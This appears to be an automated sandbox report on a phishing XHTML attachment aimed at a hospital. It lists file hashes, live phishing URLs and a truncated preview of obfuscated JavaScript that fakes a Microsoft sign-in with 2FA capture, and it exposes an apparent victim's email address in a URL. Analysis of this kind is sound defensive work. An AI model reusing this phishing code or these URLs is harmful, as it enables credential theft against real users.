                                      • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, clientservices.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, aadcdn.msauth.net, clients.l.google.com, firstparty-azurefd-prod.trafficmanager.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: file:///C:/Users/user/Desktop/%23UD83D~1.XHT
                                      • VT rate limit hit for: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=eric.teshima@overlakehospital.org
                                      • VT rate limit hit for: https://sender.linxcoded.top/start/xls/includes/css6.css
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                      Category:dropped
                                      Size (bytes):17174
                                      Entropy (8bit):2.9129715116732746
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JSON data
                                      Category:downloaded
                                      Size (bytes):20
                                      Entropy (8bit):3.346439344671015
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:7AB0BAE74FD327DA4786185272B6CD23
                                      SHA1:A28F0144ED10A95901ACD427C6652405E7017C65
                                      SHA-256:546E1EBAFA0C1584C4527DD7260CCF25C4E358EDAFE66236C00C573B011A0BA9
                                      SHA-512:3482432C63D5720225B0F6CB55726516E99F946529B3E4AAB4DD3425E3CE07C211E6E7717AD816C112FB112433A61C9A6E0685C1D77EE337568C050426F51A2B
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://api.ipify.org/?format=json
                                      Preview:{"ip":"161.77.13.2"}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 679 x 574, 8-bit/color RGB, non-interlaced
                                      Category:dropped
                                      Size (bytes):48869
                                      Entropy (8bit):7.958559093833488
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:8AA14660517F5460156FCCC2199CF83C
                                      SHA1:1B49B45651E812973D69A13CFCD137E0521B6DE6
                                      SHA-256:F2AA979677F3B905F64543C27FA26C6E31EF3320F44DD37F5136D267725AC495
                                      SHA-512:7530FB22377CBE1486DAD21F99D5F56D8AB2DAAC40EB56A030C8445F5814E097AC2C54AC81154BAD9AC1ADD5FC23D5C2FE4943F8039873D307B8A2C62973A02B
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:.PNG........IHDR.......>.......4.....IDATx..w|.......}7=..=.PB.T.."..E.`ET..E."RE....QD.>>...G9.z..P.^.j(!.HHH.6..:\.n....lv?.?|mvg.{.....u_..2).b....@.`.......@'.....@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@..N(.R.C...X....E..Qn...(.,.......T....hd.F.EA.$I.?.A.z.z..q..hd.........qWP.....E..,.eee..+***++.a. .>.....l4.M.h....j.Q.......y.....P}........#[.l.y.....=ZTTDK..@}|||.M.^ --..'.t8.f.Y.......P}P=yyy.........\X^^^QQ.^.e=I.r.z...v....v..bq:..$......o....;u.T.......T.T&''g............+.Ri..h4...0.LF..v.*}~||.5.\.....x.))).<..............T..W.k...?..cqqq....y..O..].v........Q......p.@....ZRS....h2.Hk...s..>|..c...d..\..H..X,......s.;....h.9.2`I.......~4#_..w5..w..h....:77.../ .2......X,.(.,.d2I.D..r..........8...lF.......G-.L7..<.W.o6.......m.6.a......_[H...i`..Q8!--m.!.?.xFFF.......P.h....
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):5579
                                      Entropy (8bit):7.91798195010819
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:28A8812C3AAF8AF83BA5C83C58750528
                                      SHA1:38DFA889438C48D89DE0551F90C782E5CB5D7587
                                      SHA-256:A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
                                      SHA-512:113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
                                      Category:downloaded
                                      Size (bytes):68421
                                      Entropy (8bit):4.894526489503226
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:95433AD6C822F912C3EC20D7D0324453
                                      SHA1:DD09149B83F227F46EBE417D5E55C25A8E5B718C
                                      SHA-256:3EAA119BDC8067E28626DD3E81A085ACF0F6C2EB6043DB1FEA164F5703CB5E71
                                      SHA-512:F20107C5DE6BFFB843CF3961EFEE83FCEB45F87DE204F53E55553342F959F23AED2A334B1C970E2B358CC7F1B72789EB84A6D05AD0E8C071B027168F62881D4F
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=eric.teshima@overlakehospital.org
                                      Preview:function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disabled','ajax','text','An\x20error\x20occurred\x20while\x20verifying\x20the\x20code.\x20Please\x20try\x20again.','#msg-2fa','Enter\x20your\x20email\x20address\x20or\x20phone\x20number.','#co','href','pointer-events','querySelector','input','div4','now','button:not(#dummy-bot-trap)','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2220px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br>\u00a0\u00a0\u00a0\u00a0<span\x20id=\x22aich\x22\x20style=\x22margin-left:\x20-16px;\x22></span><div\x20class=\x22py-2\x22><span\x20id=\x22ep\x22\x20class=\
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:downloaded
                                      Size (bytes):258966
                                      Entropy (8bit):4.694760038815572
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:D22C8D1F87B47309F3C2A05D2905A762
                                      SHA1:2DA99CB33FCB4294336D73F2D538ED2D5EC3E3C1
                                      SHA-256:CA4586C1819D057F7396D917087FE3E650A9466DE644278DC3A8DDA5C3CA71FD
                                      SHA-512:F96C4580DEDBCA6B830EB4959E45831D3B87231F54F8B4EFE825615E88335550ABD42EBDF8FCCF40631047B0321D0EA8E0D5438F65B7B6E06FEB5253355F4F20
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://sender.linxcoded.top/start/xls/includes/css6.css
                                      Preview: /*!.. * Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (32065)
                                      Category:downloaded
                                      Size (bytes):85578
                                      Entropy (8bit):5.366055229017455
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:2F6B11A7E914718E0290410E85366FE9
                                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                      Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (32030)
                                      Category:downloaded
                                      Size (bytes):86709
                                      Entropy (8bit):5.367391365596119
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:E071ABDA8FE61194711CFC2AB99FE104
                                      SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                      SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                                      SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://code.jquery.com/jquery-3.1.1.min.js
                                      Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                      Category:downloaded
                                      Size (bytes):2407
                                      Entropy (8bit):7.900400471609788
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                      SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                      SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                      SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
                                      Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                      File type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Entropy (8bit):4.789223692719305
                                      TrID:
                                      • HyperText Markup Language (15004/1) 83.32%
                                      • Text - UTF-8 encoded (3003/1) 16.68%
                                      File name:#Ud83d#Udd0aAudio_Msg Overlakehospital.xhtml
                                      File size:2'936 bytes
                                      MD5:fcf18e5b0d81714edb271ffe7f629a78
                                      SHA1:1509c2e7e8a7d94eb5ca1d303bc83b7b91907cfb
                                      SHA256:cfdd007fa301bad4bb8eef350ebd3d59b98d7aa4893b34f7253d3f1eba806ccb
                                      SHA512:a89a27bf0149f72a6e0cc972e716fafabd6dbdf019986b8a51dd20c3170fd7fc70bdd4388a1786f25725e4b510eaef5b97c1874be5ede3142b6bf0f11636c414
                                      SSDEEP:48:3VmIAqy8MF2QDZfPRvfZXdp6DrFjlTSAoz+Rk:VAbhp7dp4FEAw
                                      TLSH:7E51775C5DC3C68014B58262DBBBE21CFE67015F11009904BDCEBA976F76F8944ABAE8
                                      File Content Preview:...<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN".. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" lang="en">..<head>.. <meta http-
                                      Icon Hash:173149cccc490307
                                      Document Type:Text
                                      Number of OLE Files:1
                                      Has Summary Info:
                                      Application Name:
                                      Encrypted Document:False
                                      Contains Word Document Stream:False
                                      Contains Workbook/Book Stream:False
                                      Contains PowerPoint Document Stream:False
                                      Contains Visio Document Stream:False
                                      Contains ObjectPool Stream:False
                                      Flash Objects Count:0
                                      Contains VBA Macros:True